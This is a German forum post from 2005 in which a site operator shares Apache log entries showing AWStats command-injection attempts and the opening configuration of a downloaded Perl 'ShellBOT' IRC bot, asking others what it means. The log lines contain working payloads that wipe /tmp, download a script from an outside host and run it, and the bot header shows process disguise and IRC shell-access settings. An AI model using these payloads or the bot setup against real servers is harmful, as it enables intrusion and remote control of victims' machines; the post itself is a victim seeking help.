Hallo,
habe mir heute mein Log-File von meiner Rothaut (Apache) angeschaut. Dort vielen mir diese Einträge auf:
27:39 +0200] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/f1031nn/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 287
207.44.250.51 - - [25/Aug/2005:16:27:39 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/f1031nn/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 294
207.44.250.51 - - [25/Aug/2005:16:27:40 +0200] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/f1031nn/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 294
207.44.250.51 - - [25/Aug/2005:16:27:40 +0200] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/f1031nn/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 290
207.44.250.51 - - [25/Aug/2005:16:27:40 +0200] "GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/f1031nn/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 297
207.44.250.51 - - [25/Aug/2005:16:27:41 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/f1031nn/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 292
207.44.250.51 - - [25/Aug/2005:16:27:41 +0200] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/f1031nn/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 300
207.44.250.51 - - [25/Aug/2005:16:27:41 +0200] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/f1031nn/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 300
Naja, habe mir dann diese a.pl mal gespeichert.
Der Anfang sieht so aus:
#!/usr/bin/perl
#
# ShellBOT - hackbox
#
# 0ldW0lf - bai3tzasu@yahoo.com
# - www.atrix-team.org
# - www.atrix.cjb.net
#
#
################ CONFIGURACAO #################################################################
my $processo = \'/usr/local/apache/bin/httpd -DSSL\'; # Nome do processo que vai aparece no ps #
#----------------------------------------------################################################
my $linas_max=\'48\'; # Evita o flood :) depois de X linhas #
#----------------------------------------------################################################
my $sleep=\'4\'; # ele dorme X segundos #
##################### IRC #####################################################################
my @adms=("poison","asfasdas"); # Nick do administrador #
#----------------------------------------------################################################
my @canais=("#poison laura"); # Caso haja senha ("#canal :senha") #
#----------------------------------------------################################################
my $nick=\'poison\'; # Nick do bot. Caso esteja em uso vai aparecer #
# aparecer com numero radonamico no final #
#----------------------------------------------################################################
my $ircname = \'cineva\'; # User ID #
#----------------------------------------------################################################
chop (my $realname = `uname -a`); # Full Name #
#----------------------------------------------################################################
$servidor=\'eu.undernet.org\' unless $servidor; # Servidor de irc que vai ser usado #
# caso não seja especificado no argumento #
#----------------------------------------------################################################
my $porta=\'6667\'; # Porta do servidor de irc #
################ ACESSO A SHELL ###############################################################
my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
###############################################################################################
Das einzige, was mir so spontan auffällt, ist das der Port 6667 angesprochen (?) wird.
Jemand eine Idee?
Gerald
thomas woelfer
Gerald Reinhard
